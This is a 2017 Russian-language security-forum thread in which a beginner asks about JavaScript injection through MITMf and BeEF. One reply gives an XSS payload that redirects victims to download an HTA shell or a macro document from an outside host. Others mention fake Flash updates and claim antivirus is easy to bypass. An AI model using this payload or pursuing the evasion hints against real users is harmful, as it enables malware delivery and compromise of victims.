HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Beef или не beef? Вот в чем вопрос.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.04.2017, 21:55
dom1
Guest
Сообщений: n/a
Провел на форуме:
6426

Репутация: 0
По умолчанию
Всем доброго времени суток.

Не так давно начал интересоваться пентестингом (да-да я шарю за модные словечки).

Покурил инфу про MITMF - всё замечательно.

Дошли руки до инжекта JS.

Побаловался с alert('Hola'); - тоже всё замечательно.

Само собой, захотелось инжектить что-то более-менее интересное.

Покурил информацию про Beef - оказался кал в блестящей обертке: хук еще попробуй заинжекти, думает долго, делает долго, работоспособность многих модулей огорчила.

В общем задумка то классная, а вот реализация ожиданий не оправдала.

Итого: интересуют какие-либо аналогичные фреймворки и, впрочем, любая информация / мысли по поводу инжектов через MITMF.

В сети информации минимум, начал читать книги по JS, научился модифицировать страницы посредством JS, но, думаю, потенциал у этой развлекухи бОльший.

Всем спасибо за внимание (многобукафф утомляют, знаю).

Надеюсь что кто-нибудь что-нибудь таки предложит. Тапки не кидать - своих достаточно.
 
Ответить с цитированием

  #2  
Старый 15.04.2017, 00:03
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
Хочешь самый клевый пэйлоад для ХSS?!

Отвечу сразу: document.location.href = 'http://www.hacker.ru/shell.hta' или document.location.href = 'http://www.hacker.ru/file.docm'
 
Ответить с цитированием

  #3  
Старый 15.04.2017, 00:22
dom1
Guest
Сообщений: n/a
Провел на форуме:
6426

Репутация: 0
По умолчанию
Цитата:
Сообщение от SooLFaa  
SooLFaa said:

Хочешь самый клевый пэйлоад для ХSS?!
Отвечу сразу: document.location.href = '
http://www.hacker.ru/shell.hta
' или document.location.href = '
http://www.hacker.ru/file.docm
'
И чем это закончится? Скачиванием шелла? А запускать его кто будет?
 
Ответить с цитированием

  #4  
Старый 15.04.2017, 01:47
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
Цитата:
Сообщение от dom1  
dom1 said:

И чем это закончится? Скачиванием шелла? А запускать его кто будет?
Гугли что такое hta и как оно работает. Все нагрузки бифа работают тоже с соц инженерией так или иначе. Начиная от фейк флэш апдейта и заканчивая доком с макросами. А те нагрузки, которые юзают утечку памяти в браузерах работали еще в бородатые времена.
 
Ответить с цитированием

  #5  
Старый 15.04.2017, 01:51
dom1
Guest
Сообщений: n/a
Провел на форуме:
6426

Репутация: 0
По умолчанию
Цитата:
Сообщение от SooLFaa  
SooLFaa said:

Гугли что такое hta и как оно работает. Все нагрузки бифа работают тоже с соц инженерией так или иначе. Начиная от фейк флэш апдейта и заканчивая доком с макросами. А те нагрузки, которые юзают утечку памяти в браузерах работали еще в бородатые времена.
Спасибо. Пошел читать гугол.
 
Ответить с цитированием

  #6  
Старый 16.04.2017, 05:00
dom1
Guest
Сообщений: n/a
Провел на форуме:
6426

Репутация: 0
По умолчанию
Цитата:
Сообщение от SooLFaa  
SooLFaa said:

Гугли что такое hta и как оно работает. Все нагрузки бифа работают тоже с соц инженерией так или иначе. Начиная от фейк флэш апдейта и заканчивая доком с макросами. А те нагрузки, которые юзают утечку памяти в браузерах работали еще в бородатые времена.


При таком раскладе уже лучше beef юзать
 
Ответить с цитированием

  #7  
Старый 16.04.2017, 13:36
SooLFaa
Guest
Сообщений: n/a
Провел на форуме:
187765

Репутация: 154
По умолчанию
Цитата:
Сообщение от dom1  
dom1 said:


При таком раскладе уже лучше beef юзать
Вот как правило, те кто юзают всякие программки без знаня дела и имеют проблемы как на твоем скрине. Скрипт кидисами таких еще называют, а если бы ты копнул глубже и немного включил голову, то понял бы что вариантов байпассить АВ в том числе стандартный хромовский есть очень много. Я это не корнетно про hta а в целом в том числе powerhell.
 
Ответить с цитированием

  #8  
Старый 16.04.2017, 18:00
dom1
Guest
Сообщений: n/a
Провел на форуме:
6426

Репутация: 0
По умолчанию
Цитата:
Сообщение от SooLFaa  
SooLFaa said:

Вот как правило, те кто юзают всякие программки без знаня дела и имеют проблемы как на твоем скрине. Скрипт кидисами таких еще называют, а если бы ты копнул глубже и немного включил голову, то понял бы что вариантов байпассить АВ в том числе стандартный хромовский есть очень много. Я это не корнетно про hta а в целом в том числе powerhell.
Я еще в топике написал что я полный ноль. Я сразу сказал что НЕ обладаю знанием дела. Потому и начал спрашивать. Ты в меня кинул 3 буквы hta и я пошел с ними в гугол. Интересно, ты чего ожидал?)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ